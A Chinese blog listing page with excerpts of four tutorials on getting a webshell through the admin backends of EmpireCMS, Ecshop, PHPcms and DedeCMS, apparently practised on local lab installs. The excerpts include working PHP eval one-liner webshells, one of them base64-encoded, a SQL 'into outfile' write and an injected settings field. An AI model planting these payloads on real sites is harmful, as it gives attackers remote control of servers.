![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
常见框架的webshell
每天都要努力哇
这个作者很懒,什么都没留下…
展开
-
帝国cms框架的Webshell
1:登录后台地址:127.0.0.1/empirecms/e/admin登录界面2:webshell选择进入后台地图-管理自定义页面增加自定义页面这里要用'写入一句话木马<?php fputs(fopen("shell.php","a"),'<?php phpinfo();eval($_POST[cmd]);?>')?>然后访问:http://127.0.0.1/empirecms/e/admin/shell.php用蚁剑连接可以看到成功连接原创 2020-12-19 16:57:52 · 590 阅读 · 2 评论 -
Ecshop框架的Webshell
一、登录情况因为后台没有放东西 嘛所以就啥也没有这是后台地址http://127.0.0.1/ecshop/admin/二、后台拿webshell三种思路演示1、执行数据库命令拿webshell首先需要找到可写入命令的页面:select '<?php eval($_POST[1])?>' into outfile'最后经过测试?和into outfile都会报错这里可以利用符号代替或者混淆的方式替换掉,最终的思路是写入一句话在into outfile写入到改原创 2020-12-19 16:57:59 · 289 阅读 · 0 评论 -
PHPcms框架的Webshell
登录界面后台网址www.phpcms.com/admin.php进入主页面代码注入拿webshell接下来 我直接就上图了写入一句话木马<?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?>查看专题继续添加第二个专题利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一原创 2020-12-19 16:58:10 · 366 阅读 · 2 评论 -
织梦dedecms的框架的Webshell
一、后台后台登录 http://www.dedecms.com/dede后台界面二、Webshell方法方法1:文件上传蚁剑进行连接成功方法2:新建一句话文件蚁剑连接方法3:html修改打开模板-默认模版管理-index.htm文件包含将FTP21端口改成:<?php @eval($_REQUEST["dayu"]); ?>...原创 2020-12-19 16:58:19 · 350 阅读 · 1 评论